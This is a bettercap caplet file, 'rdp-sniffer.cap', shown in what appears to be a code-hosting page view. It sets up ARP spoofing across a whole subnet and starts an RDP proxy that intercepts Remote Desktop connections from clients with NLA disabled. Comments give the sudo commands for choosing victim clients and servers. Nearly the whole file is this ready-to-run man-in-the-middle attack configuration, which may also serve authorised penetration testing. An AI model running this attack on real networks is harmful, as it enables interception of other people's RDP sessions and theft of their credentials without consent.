/
rdp-sniffer.cap
41 lines (34 loc) · 1.6 KB
/
rdp-sniffer.cap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# This module lets you arp spoof desired targets, and proxy their RDP connections if they have NLA disabled.
# If they don't, we forward their connection without spawning PyRDP.
#
# Targets the whole subnet by default. Can be configured in bettercap or in this file.
#
# To change arp-spoofed targets :
# sudo ./bettercap -caplet rdp-sniffer.cap -eval "set arp.spoof.targets 192.168.0.50, 192.168.0.51;"
#
# To change RDP proxy targets :
# sudo ./bettercap -caplet rdp-sniffer.cap -eval "set rdp.proxy.targets 192.168.0.50;"
#
# To change both targets :
# sudo ./bettercap -caplet rdp-sniffer.cap -eval "set arp.spoof.targets 192.168.0.50, 192.168.0.51; set rdp.proxy.targets 192.168.0.50;"
# Setup arp spoofing
# If true, local connections among computers of the network will be spoofed as well
# Otherwise only connections going to and coming from the external network.
set arp.spoof.internal true
# If you intend to spoof the gateway, you may need to enable the full-duplex spoofing, which will spoof both the gateway and the targets.
# You will need to enable this if you only seem to intercept half the traffic.
set arp.spoof.fullduplex false
# Setup targets
# Uncomment to specify targets, otherwise our target is the whole subnet.
# Your arp-spoof targets should be the client attempting to connect to RDP
#set arp.spoof.targets 192.168.0.50, 192.168.0.51
# Your rdp-proxy targets should be the RDP servers to which clients will try to connect
#set rdp.proxy.targets 192.168.0.50
# Start everything
arp.spoof on
rdp.proxy on
# Silence net.recon to avoid useless spam
events.ignore endpoint
# Start fresh
events.clear
clear